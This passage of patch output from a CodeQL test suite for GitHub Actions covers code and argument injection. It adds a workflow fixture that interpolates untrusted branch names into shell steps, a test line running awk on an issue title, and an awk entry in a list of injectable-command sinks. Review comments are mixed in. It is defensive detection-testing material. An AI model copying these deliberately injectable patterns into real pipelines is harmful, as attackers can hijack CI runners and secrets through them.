which will be used to + # set the artifact folder names (because the character `/` is not allowed). 
+ run: | + echo "${{ matrix.folders }}" + echo "${{ fromJson(needs.setup.outputs.test_map)[matrix.folders] }}" + matrix_folders=${{ matrix.folders }} + matrix_folders=${matrix_folders/'models/'/'models_'} + echo "$matrix_folders" + echo "matrix_folders=$matrix_folders" >> $GITHUB_ENV + + - name: NVIDIA-SMI + run: | + nvidia-smi + + - name: Environment + working-directory: /transformers + run: | + python3 utils/print_env.py + + - name: Show installed libraries and their versions + working-directory: /transformers + run: pip freeze + + - name: Run all non-slow selected tests on GPU + working-directory: /transformers + run: | + python3 -m pytest -n 2 --dist=loadfile -v --make-reports=${{ matrix.machine_type }}_tests_gpu_${{ matrix.folders }} ${{ fromJson(needs.setup.outputs.test_map)[matrix.folders] }} + + - name: Failure short reports + if: ${{ failure() }} + continue-on-error: true + run: cat /transformers/reports/${{ matrix.machine_type }}_tests_gpu_${{ matrix.folders }}/failures_short.txt + + - name: "Test suite reports artifacts: ${{ matrix.machine_type }}_run_all_tests_gpu_${{ env.matrix_folders }}_test_reports" + if: ${{ always() }} + uses: actions/upload-artifact@v4 + with: + name: ${{ matrix.machine_type }}_run_all_tests_gpu_${{ env.matrix_folders }}_test_reports + path: /transformers/reports/${{ matrix.machine_type }}_tests_gpu_${{ matrix.folders }} + + run_tests_multi_gpu: + name: Model tests + needs: setup + # `dummy` means there is no test to run + if: contains(fromJson(needs.setup.outputs.matrix), 'dummy') != true + strategy: + fail-fast: false + matrix: + folders: ${{ fromJson(needs.setup.outputs.matrix) }} + machine_type: [multi-gpu] + runs-on: ['${{ matrix.machine_type }}', nvidia-gpu, t4, push-ci] + container: + image: huggingface/transformers-all-latest-gpu-push-ci + options: --gpus all --shm-size "16gb" --ipc host -v /mnt/cache/.cache/huggingface:/mnt/cache/ + steps: + # Necessary to get the correct branch name and commit SHA for `workflow_run` 
event + # We also take into account the `push` event (we might want to test some changes in a branch) + - name: Prepare custom environment variables + shell: bash + # For the meaning of these environment variables, see the job `Setup` + run: | + CI_BRANCH_PUSH=${{ github.event.ref }} + CI_BRANCH_PUSH=${CI_BRANCH_PUSH/'refs/heads/'/''} + CI_BRANCH_WORKFLOW_RUN=${{ github.event.workflow_run.head_branch }} + CI_SHA_PUSH=${{ github.event.head_commit.id }} + CI_SHA_WORKFLOW_RUN=${{ github.event.workflow_run.head_sha }} + echo $CI_BRANCH_PUSH + echo $CI_BRANCH_WORKFLOW_RUN + echo $CI_SHA_PUSH + echo $CI_SHA_WORKFLOW_RUN + [[ ! -z "$CI_BRANCH_PUSH" ]] && echo "CI_BRANCH=$CI_BRANCH_PUSH" >> $GITHUB_ENV || echo "CI_BRANCH=$CI_BRANCH_WORKFLOW_RUN" >> $GITHUB_ENV + [[ ! -z "$CI_SHA_PUSH" ]] && echo "CI_SHA=$CI_SHA_PUSH" >> $GITHUB_ENV || echo "CI_SHA=$CI_SHA_WORKFLOW_RUN" >> $GITHUB_ENV + + - name: print environment variables + run: | + echo "env.CI_BRANCH = ${{ env.CI_BRANCH }}" + echo "env.CI_SHA = ${{ env.CI_SHA }}" + + - name: Update clone using environment variables + working-directory: /transformers + run: | + echo "original branch = $(git branch --show-current)" + git fetch && git checkout ${{ env.CI_BRANCH }} + echo "updated branch = $(git branch --show-current)" + git checkout ${{ env.CI_SHA }} + echo "log = $(git log -n 1)" + + - name: Reinstall transformers in edit mode (remove the one installed during docker image build) + working-directory: /transformers + run: python3 -m pip uninstall -y transformers && python3 -m pip install -e . + + - name: Echo folder ${{ matrix.folders }} + shell: bash + # For folders like `models/bert`, set an env. var. (`matrix_folders`) to `models_bert`, which will be used to + # set the artifact folder names (because the character `/` is not allowed). 
+ run: | + echo "${{ matrix.folders }}" + echo "${{ fromJson(needs.setup.outputs.test_map)[matrix.folders] }}" + matrix_folders=${{ matrix.folders }} + matrix_folders=${matrix_folders/'models/'/'models_'} + echo "$matrix_folders" + echo "matrix_folders=$matrix_folders" >> $GITHUB_ENV + + - name: NVIDIA-SMI + run: | + nvidia-smi + + - name: Environment + working-directory: /transformers + run: | + python3 utils/print_env.py + + - name: Show installed libraries and their versions + working-directory: /transformers + run: pip freeze + + - name: Run all non-slow selected tests on GPU + env: + MKL_SERVICE_FORCE_INTEL: 1 + working-directory: /transformers + run: | + python3 -m pytest -n 2 --dist=loadfile -v --make-reports=${{ matrix.machine_type }}_tests_gpu_${{ matrix.folders }} ${{ fromJson(needs.setup.outputs.test_map)[matrix.folders] }} + + - name: Failure short reports + if: ${{ failure() }} + continue-on-error: true + run: cat /transformers/reports/${{ matrix.machine_type }}_tests_gpu_${{ matrix.folders }}/failures_short.txt + + - name: "Test suite reports artifacts: ${{ matrix.machine_type }}_run_all_tests_gpu_${{ env.matrix_folders }}_test_reports" + if: ${{ always() }} + uses: actions/upload-artifact@v4 + with: + name: ${{ matrix.machine_type }}_run_all_tests_gpu_${{ env.matrix_folders }}_test_reports + path: /transformers/reports/${{ matrix.machine_type }}_tests_gpu_${{ matrix.folders }} + + run_tests_torch_cuda_extensions_single_gpu: + name: Torch CUDA extension tests + needs: setup + if: contains(fromJson(needs.setup.outputs.matrix), 'deepspeed') || contains(fromJson(needs.setup.outputs.matrix), 'extended') + strategy: + fail-fast: false + matrix: + machine_type: [single-gpu] + runs-on: ['${{ matrix.machine_type }}', nvidia-gpu, t4, push-ci] + container: + image: huggingface/transformers-pytorch-deepspeed-latest-gpu-push-ci + options: --gpus 0 --shm-size "16gb" --ipc host -v /mnt/cache/.cache/huggingface:/mnt/cache/ + steps: + # Necessary to get the correct 
branch name and commit SHA for `workflow_run` event + # We also take into account the `push` event (we might want to test some changes in a branch) + - name: Prepare custom environment variables + shell: bash + # For the meaning of these environment variables, see the job `Setup` + run: | + CI_BRANCH_PUSH=${{ github.event.ref }} + CI_BRANCH_PUSH=${CI_BRANCH_PUSH/'refs/heads/'/''} + CI_BRANCH_WORKFLOW_RUN=${{ github.event.workflow_run.head_branch }} + CI_SHA_PUSH=${{ github.event.head_commit.id }} + CI_SHA_WORKFLOW_RUN=${{ github.event.workflow_run.head_sha }} + echo $CI_BRANCH_PUSH + echo $CI_BRANCH_WORKFLOW_RUN + echo $CI_SHA_PUSH + echo $CI_SHA_WORKFLOW_RUN + [[ ! -z "$CI_BRANCH_PUSH" ]] && echo "CI_BRANCH=$CI_BRANCH_PUSH" >> $GITHUB_ENV || echo "CI_BRANCH=$CI_BRANCH_WORKFLOW_RUN" >> $GITHUB_ENV + [[ ! -z "$CI_SHA_PUSH" ]] && echo "CI_SHA=$CI_SHA_PUSH" >> $GITHUB_ENV || echo "CI_SHA=$CI_SHA_WORKFLOW_RUN" >> $GITHUB_ENV + + - name: print environment variables + run: | + echo "env.CI_BRANCH = ${{ env.CI_BRANCH }}" + echo "env.CI_SHA = ${{ env.CI_SHA }}" + + - name: Update clone using environment variables + working-directory: /workspace/transformers + run: | + echo "original branch = $(git branch --show-current)" + git fetch && git checkout ${{ env.CI_BRANCH }} + echo "updated branch = $(git branch --show-current)" + git checkout ${{ env.CI_SHA }} + echo "log = $(git log -n 1)" + + - name: Reinstall transformers in edit mode (remove the one installed during docker image build) + working-directory: /workspace/transformers + run: python3 -m pip uninstall -y transformers && python3 -m pip install -e . 
+ + - name: Remove cached torch extensions + run: rm -rf /github/home/.cache/torch_extensions/ + + # To avoid unknown test failures + - name: Pre build DeepSpeed *again* + working-directory: /workspace + run: | + python3 -m pip uninstall -y deepspeed + DS_BUILD_CPU_ADAM=1 DS_BUILD_FUSED_ADAM=1 python3 -m pip install deepspeed --global-option="build_ext" --global-option="-j8" --no-cache -v --disable-pip-version-check + + - name: NVIDIA-SMI + run: | + nvidia-smi + + - name: Environment + working-directory: /workspace/transformers + run: | + python utils/print_env.py + + - name: Show installed libraries and their versions + working-directory: /workspace/transformers + run: pip freeze + + - name: Run all non-slow selected tests on GPU + working-directory: /workspace/transformers + # TODO: Here we pass all tests in the 2 folders for simplicity. It's better to pass only the identified tests. + run: | + python -m pytest -n 1 --dist=loadfile -v --make-reports=${{ matrix.machine_type }}_run_torch_cuda_extensions_gpu_test_reports tests/deepspeed tests/extended + + - name: Failure short reports + if: ${{ failure() }} + continue-on-error: true + run: cat /workspace/transformers/reports/${{ matrix.machine_type }}_run_torch_cuda_extensions_gpu_test_reports/failures_short.txt + + - name: "Test suite reports artifacts: ${{ matrix.machine_type }}_run_torch_cuda_extensions_gpu_test_reports" + if: ${{ always() }} + uses: actions/upload-artifact@v4 + with: + name: ${{ matrix.machine_type }}_run_torch_cuda_extensions_gpu_test_reports + path: /workspace/transformers/reports/${{ matrix.machine_type }}_run_torch_cuda_extensions_gpu_test_reports + + run_tests_torch_cuda_extensions_multi_gpu: + name: Torch CUDA extension tests + needs: setup + if: contains(fromJson(needs.setup.outputs.matrix), 'deepspeed') || contains(fromJson(needs.setup.outputs.matrix), 'extended') + strategy: + fail-fast: false + matrix: + machine_type: [multi-gpu] + runs-on: ['${{ matrix.machine_type }}', nvidia-gpu, 
t4, push-ci] + container: + image: huggingface/transformers-pytorch-deepspeed-latest-gpu-push-ci + options: --gpus all --shm-size "16gb" --ipc host -v /mnt/cache/.cache/huggingface:/mnt/cache/ + steps: + # Necessary to get the correct branch name and commit SHA for `workflow_run` event + # We also take into account the `push` event (we might want to test some changes in a branch) + - name: Prepare custom environment variables + shell: bash + # For the meaning of these environment variables, see the job `Setup` + run: | + CI_BRANCH_PUSH=${{ github.event.ref }} + CI_BRANCH_PUSH=${CI_BRANCH_PUSH/'refs/heads/'/''} + CI_BRANCH_WORKFLOW_RUN=${{ github.event.workflow_run.head_branch }} + CI_SHA_PUSH=${{ github.event.head_commit.id }} + CI_SHA_WORKFLOW_RUN=${{ github.event.workflow_run.head_sha }} + echo $CI_BRANCH_PUSH + echo $CI_BRANCH_WORKFLOW_RUN + echo $CI_SHA_PUSH + echo $CI_SHA_WORKFLOW_RUN + [[ ! -z "$CI_BRANCH_PUSH" ]] && echo "CI_BRANCH=$CI_BRANCH_PUSH" >> $GITHUB_ENV || echo "CI_BRANCH=$CI_BRANCH_WORKFLOW_RUN" >> $GITHUB_ENV + [[ ! -z "$CI_SHA_PUSH" ]] && echo "CI_SHA=$CI_SHA_PUSH" >> $GITHUB_ENV || echo "CI_SHA=$CI_SHA_WORKFLOW_RUN" >> $GITHUB_ENV + + - name: print environment variables + run: | + echo "env.CI_BRANCH = ${{ env.CI_BRANCH }}" + echo "env.CI_SHA = ${{ env.CI_SHA }}" + + - name: Update clone using environment variables + working-directory: /workspace/transformers + run: | + echo "original branch = $(git branch --show-current)" + git fetch && git checkout ${{ env.CI_BRANCH }} + echo "updated branch = $(git branch --show-current)" + git checkout ${{ env.CI_SHA }} + echo "log = $(git log -n 1)" + + - name: Reinstall transformers in edit mode (remove the one installed during docker image build) + working-directory: /workspace/transformers + run: python3 -m pip uninstall -y transformers && python3 -m pip install -e . 
+ + - name: Remove cached torch extensions + run: rm -rf /github/home/.cache/torch_extensions/ + + # To avoid unknown test failures + - name: Pre build DeepSpeed *again* + working-directory: /workspace + run: | + python3 -m pip uninstall -y deepspeed + DS_BUILD_CPU_ADAM=1 DS_BUILD_FUSED_ADAM=1 python3 -m pip install deepspeed --global-option="build_ext" --global-option="-j8" --no-cache -v --disable-pip-version-check + + - name: NVIDIA-SMI + run: | + nvidia-smi + + - name: Environment + working-directory: /workspace/transformers + run: | + python utils/print_env.py + + - name: Show installed libraries and their versions + working-directory: /workspace/transformers + run: pip freeze + + - name: Run all non-slow selected tests on GPU + working-directory: /workspace/transformers + # TODO: Here we pass all tests in the 2 folders for simplicity. It's better to pass only the identified tests. + run: | + python -m pytest -n 1 --dist=loadfile -v --make-reports=${{ matrix.machine_type }}_run_torch_cuda_extensions_gpu_test_reports tests/deepspeed tests/extended + + - name: Failure short reports + if: ${{ failure() }} + continue-on-error: true + run: cat /workspace/transformers/reports/${{ matrix.machine_type }}_run_torch_cuda_extensions_gpu_test_reports/failures_short.txt + + - name: "Test suite reports artifacts: ${{ matrix.machine_type }}_run_torch_cuda_extensions_gpu_test_reports" + if: ${{ always() }} + uses: actions/upload-artifact@v4 + with: + name: ${{ matrix.machine_type }}_run_torch_cuda_extensions_gpu_test_reports + path: /workspace/transformers/reports/${{ matrix.machine_type }}_run_torch_cuda_extensions_gpu_test_reports + + send_results: + name: Send results to webhook + runs-on: ubuntu-22.04 + if: always() + needs: [ + setup, + run_tests_single_gpu, + run_tests_multi_gpu, + run_tests_torch_cuda_extensions_single_gpu, + run_tests_torch_cuda_extensions_multi_gpu + ] + steps: + - name: Preliminary job status + shell: bash + # For the meaning of these environment 
variables, see the job `Setup` + run: | + echo "Setup status: ${{ needs.setup.result }}" + + # Necessary to get the correct branch name and commit SHA for `workflow_run` event + # We also take into account the `push` event (we might want to test some changes in a branch) + - name: Prepare custom environment variables + shell: bash + # For the meaning of these environment variables, see the job `Setup` + run: | + CI_BRANCH_PUSH=${{ github.event.ref }} + CI_BRANCH_PUSH=${CI_BRANCH_PUSH/'refs/heads/'/''} + CI_BRANCH_WORKFLOW_RUN=${{ github.event.workflow_run.head_branch }} + CI_SHA_PUSH=${{ github.event.head_commit.id }} + CI_SHA_WORKFLOW_RUN=${{ github.event.workflow_run.head_sha }} + echo $CI_BRANCH_PUSH + echo $CI_BRANCH_WORKFLOW_RUN + echo $CI_SHA_PUSH + echo $CI_SHA_WORKFLOW_RUN + [[ ! -z "$CI_BRANCH_PUSH" ]] && echo "CI_BRANCH=$CI_BRANCH_PUSH" >> $GITHUB_ENV || echo "CI_BRANCH=$CI_BRANCH_WORKFLOW_RUN" >> $GITHUB_ENV + [[ ! -z "$CI_SHA_PUSH" ]] && echo "CI_SHA=$CI_SHA_PUSH" >> $GITHUB_ENV || echo "CI_SHA=$CI_SHA_WORKFLOW_RUN" >> $GITHUB_ENV + + - name: print environment variables + run: | + echo "env.CI_BRANCH = ${{ env.CI_BRANCH }}" + echo "env.CI_SHA = ${{ env.CI_SHA }}" + + - uses: actions/checkout@v4 + # To avoid failure when multiple commits are merged into `main` in a short period of time. + # Checking out to an old commit beyond the fetch depth will get an error `fatal: reference is not a tree: ... 
+ # (Only required for `workflow_run` event, where we get the latest HEAD on `main` instead of the event commit) + with: + fetch-depth: 20 + + - name: Update clone using environment variables + run: | + echo "original branch = $(git branch --show-current)" + git fetch && git checkout ${{ env.CI_BRANCH }} + echo "updated branch = $(git branch --show-current)" + git checkout ${{ env.CI_SHA }} + echo "log = $(git log -n 1)" + + - uses: actions/download-artifact@v4 + - name: Send message to Slack + env: + CI_SLACK_BOT_TOKEN: ${{ secrets.CI_SLACK_BOT_TOKEN }} + CI_SLACK_CHANNEL_ID: ${{ secrets.CI_SLACK_CHANNEL_ID }} + CI_SLACK_CHANNEL_ID_DAILY: ${{ secrets.CI_SLACK_CHANNEL_ID_DAILY }} + CI_SLACK_CHANNEL_DUMMY_TESTS: ${{ secrets.CI_SLACK_CHANNEL_DUMMY_TESTS }} + CI_SLACK_REPORT_CHANNEL_ID: ${{ secrets.CI_SLACK_CHANNEL_ID }} + ACCESS_REPO_INFO_TOKEN: ${{ secrets.ACCESS_REPO_INFO_TOKEN }} + CI_EVENT: push + CI_TITLE_PUSH: ${{ github.event.head_commit.message }} + CI_TITLE_WORKFLOW_RUN: ${{ github.event.workflow_run.head_commit.message }} + CI_SHA: ${{ env.CI_SHA }} + SETUP_STATUS: ${{ needs.setup.result }} + + # We pass `needs.setup.outputs.matrix` as the argument. A processing in `notification_service.py` to change + # `models/bert` to `models_bert` is required, as the artifact names use `_` instead of `/`. + run: | + pip install slack_sdk + pip show slack_sdk + python utils/notification_service.py "${{ needs.setup.outputs.matrix }}" diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected index 3330ad89311..3f2d9ebc2c9 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected 
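Review bot: The new `test10.yml` fixture has no comment saying which property it tests or what result is expected. Per the commit message the intent is that `workflow_run` restricted by `branches: ["main"]` is not reported as critical, but the 568-line file does not say that anywhere. A header comment would make it reviewable, for example `# Expected: head_branch interpolations reported as medium, not critical (workflow_run limited to branches: ["main"])`. All six expected nodes point at the same `CI_BRANCH_WORKFLOW_RUN=${{ github.event.workflow_run.head_branch }}` line repeated in each job. A fixture reduced to one job with that step and the `on:` block would cover the same behaviour and keep the `.expected` line numbers stable.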
@@ -272,6 +272,12 @@ nodes | .github/workflows/test9.yml:35:42:35:80 | toJson(github.event.issue.title) | semmle.label | toJson(github.event.issue.title) | | .github/workflows/test9.yml:39:42:39:72 | github.event.issue.title | semmle.label | github.event.issue.title | | .github/workflows/test9.yml:43:42:43:80 | toJson(github.event.issue.title) | semmle.label | toJson(github.event.issue.title) | +| .github/workflows/test10.yml:57:34:57:77 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | +| .github/workflows/test10.yml:147:34:147:77 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | +| .github/workflows/test10.yml:240:34:240:77 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | +| .github/workflows/test10.yml:333:34:333:77 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | +| .github/workflows/test10.yml:423:34:423:77 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | +| .github/workflows/test10.yml:518:34:518:77 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | | .github/workflows/test.yml:8:20:8:50 | steps.step5.outputs.MSG5 | semmle.label | steps.step5.outputs.MSG5 | | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | semmle.label | Uses Step: step0 [value] | diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected index e325205d8c8..4de44d83635 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected 
@@ -272,6 +272,12 @@ nodes | .github/workflows/test9.yml:35:42:35:80 | toJson(github.event.issue.title) | semmle.label | toJson(github.event.issue.title) | | .github/workflows/test9.yml:39:42:39:72 | github.event.issue.title | semmle.label | github.event.issue.title | | .github/workflows/test9.yml:43:42:43:80 | toJson(github.event.issue.title) | semmle.label | toJson(github.event.issue.title) | +| .github/workflows/test10.yml:57:34:57:77 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | +| .github/workflows/test10.yml:147:34:147:77 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | +| .github/workflows/test10.yml:240:34:240:77 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | +| .github/workflows/test10.yml:333:34:333:77 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | +| .github/workflows/test10.yml:423:34:423:77 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | +| .github/workflows/test10.yml:518:34:518:77 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | | .github/workflows/test.yml:8:20:8:50 | steps.step5.outputs.MSG5 | semmle.label | steps.step5.outputs.MSG5 | | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | semmle.label | Uses Step: step0 [value] | 
@@ -328,6 +334,12 @@ subpaths | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | ${{ github.event.commits[11].committer.email }} | | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | ${{ github.event.commits[11].committer.name }} | | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | .github/workflows/simple1.yml:11:20:11:58 | github.event.head_commit.message | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | ${{steps.summary.outputs.value}} | +| .github/workflows/test10.yml:57:34:57:77 | github.event.workflow_run.head_branch | .github/workflows/test10.yml:57:34:57:77 | github.event.workflow_run.head_branch | .github/workflows/test10.yml:57:34:57:77 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/test10.yml:57:34:57:77 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | +| .github/workflows/test10.yml:147:34:147:77 | github.event.workflow_run.head_branch | .github/workflows/test10.yml:147:34:147:77 | github.event.workflow_run.head_branch | .github/workflows/test10.yml:147:34:147:77 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test10.yml:147:34:147:77 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | +| .github/workflows/test10.yml:240:34:240:77 | github.event.workflow_run.head_branch | .github/workflows/test10.yml:240:34:240:77 | github.event.workflow_run.head_branch | .github/workflows/test10.yml:240:34:240:77 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test10.yml:240:34:240:77 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | +| .github/workflows/test10.yml:333:34:333:77 | github.event.workflow_run.head_branch | .github/workflows/test10.yml:333:34:333:77 | github.event.workflow_run.head_branch | .github/workflows/test10.yml:333:34:333:77 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test10.yml:333:34:333:77 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | +| .github/workflows/test10.yml:423:34:423:77 | github.event.workflow_run.head_branch | .github/workflows/test10.yml:423:34:423:77 | github.event.workflow_run.head_branch | .github/workflows/test10.yml:423:34:423:77 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/test10.yml:423:34:423:77 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | +| .github/workflows/test10.yml:518:34:518:77 | github.event.workflow_run.head_branch | .github/workflows/test10.yml:518:34:518:77 | github.event.workflow_run.head_branch | .github/workflows/test10.yml:518:34:518:77 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test10.yml:518:34:518:77 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | | .github/workflows/test.yml:49:20:49:56 | needs.job1.outputs['job_output'] | .github/workflows/test.yml:15:20:15:64 | github.event['head_commit']['message'] | .github/workflows/test.yml:49:20:49:56 | needs.job1.outputs['job_output'] | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test.yml:49:20:49:56 | needs.job1.outputs['job_output'] | ${{needs.job1.outputs['job_output']}} | | .github/workflows/workflow_run_branches1.yml:13:20:13:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches1.yml:13:20:13:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches1.yml:13:20:13:63 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run_branches1.yml:13:20:13:63 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | | .github/workflows/workflow_run_branches2.yml:13:20:13:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches2.yml:13:20:13:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches2.yml:13:20:13:63 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/workflow_run_branches2.yml:13:20:13:63 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | From eb66114d8bf0d0bc5f273f1d2b8e70873a464c31 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 11 Jul 2024 11:35:44 +0200 Subject: [PATCH 0399/1267] feat(models): New ArgInj sink --- ql/lib/ext/config/argument_injection_sinks.yml | 1 + .../Security/CWE-094/.github/workflows/arg_injection.yml | 5 +---- .../Security/CWE-094/ArgumentInjectionCritical.expected | 3 +++ .../Security/CWE-094/ArgumentInjectionMedium.expected | 2 ++ 4 files changed, 7 insertions(+), 4 deletions(-) diff --git a/ql/lib/ext/config/argument_injection_sinks.yml b/ql/lib/ext/config/argument_injection_sinks.yml index 727c982d2ec..4588af0bf00 100644 --- a/ql/lib/ext/config/argument_injection_sinks.yml +++ b/ql/lib/ext/config/argument_injection_sinks.yml @@ -4,5 +4,6 @@ extensions: extensible: argumentInjectionSinksDataModel # https://gtfobins.github.io/ data: + - ["(awk)(.*?)", 2, 3] - ["(sed)(.*?)", 2, 3] diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/arg_injection.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/arg_injection.yml index 19435af16d3..0956aea61bd 100644 --- a/ql/test/query-tests/Security/CWE-094/.github/workflows/arg_injection.yml +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/arg_injection.yml @@ -14,7 +14,4 @@ jobs: - run: sed "s/FOO/$TITLE/g" - run: echo "foo" | sed "s/FOO/$TITLE/g" > bar - run: echo $(echo "foo" | sed "s/FOO/$TITLE/g" > bar) - - - - + - run: awk "BEGIN {$TITLE}" diff --git a/ql/test/query-tests/Security/CWE-094/ArgumentInjectionCritical.expected b/ql/test/query-tests/Security/CWE-094/ArgumentInjectionCritical.expected index 21483efe36c..13f4954eac3 100644 --- a/ql/test/query-tests/Security/CWE-094/ArgumentInjectionCritical.expected +++ b/ql/test/query-tests/Security/CWE-094/ArgumentInjectionCritical.expected 
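Review bot: The indices in the new row `["(awk)(.*?)", 2, 3]` are unexplained, and the pattern on its own has only two groups. They work because `argumentInjectionSinksDataModel` in Config.qll wraps every pattern in a regexp that begins with one capturing delimiter group, so group 1 is the delimiter, 2 the command and 3 the argument. I would add a comment above `data:` such as `# indices count groups in the full regexp built in Config.qll (group 1 is its prefix delimiter): 2 = command, 3 = argument`. The `extensions:` entry starts above the hunk.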
@@ -2,13 +2,16 @@ edges | .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:14:14:14:33 | sed "s/FOO/$TITLE/g" | provenance | | | .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:15:14:15:52 | echo "foo" \| sed "s/FOO/$TITLE/g" > bar | provenance | | | .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:16:14:16:60 | echo $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar) | provenance | | +| .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:17:14:17:33 | awk "BEGIN {$TITLE}" | provenance | | nodes | .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | semmle.label | github.event.issue.title | | .github/workflows/arg_injection.yml:14:14:14:33 | sed "s/FOO/$TITLE/g" | semmle.label | sed "s/FOO/$TITLE/g" | | .github/workflows/arg_injection.yml:15:14:15:52 | echo "foo" \| sed "s/FOO/$TITLE/g" > bar | semmle.label | echo "foo" \| sed "s/FOO/$TITLE/g" > bar | | .github/workflows/arg_injection.yml:16:14:16:60 | echo $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar) | semmle.label | echo $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar) | +| .github/workflows/arg_injection.yml:17:14:17:33 | awk "BEGIN {$TITLE}" | semmle.label | awk "BEGIN {$TITLE}" | subpaths #select | .github/workflows/arg_injection.yml:14:14:14:33 | sed "s/FOO/$TITLE/g" | .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:14:14:14:33 | sed "s/FOO/$TITLE/g" | Potential argument injection in $@ command, which may be controlled by an external user. 
| .github/workflows/arg_injection.yml:14:14:14:33 | sed "s/FOO/$TITLE/g" | sed | | .github/workflows/arg_injection.yml:15:14:15:52 | echo "foo" \| sed "s/FOO/$TITLE/g" > bar | .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:15:14:15:52 | echo "foo" \| sed "s/FOO/$TITLE/g" > bar | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:15:14:15:52 | echo "foo" \| sed "s/FOO/$TITLE/g" > bar | sed | | .github/workflows/arg_injection.yml:16:14:16:60 | echo $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar) | .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:16:14:16:60 | echo $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar) | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:16:14:16:60 | echo $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar) | sed | +| .github/workflows/arg_injection.yml:17:14:17:33 | awk "BEGIN {$TITLE}" | .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:17:14:17:33 | 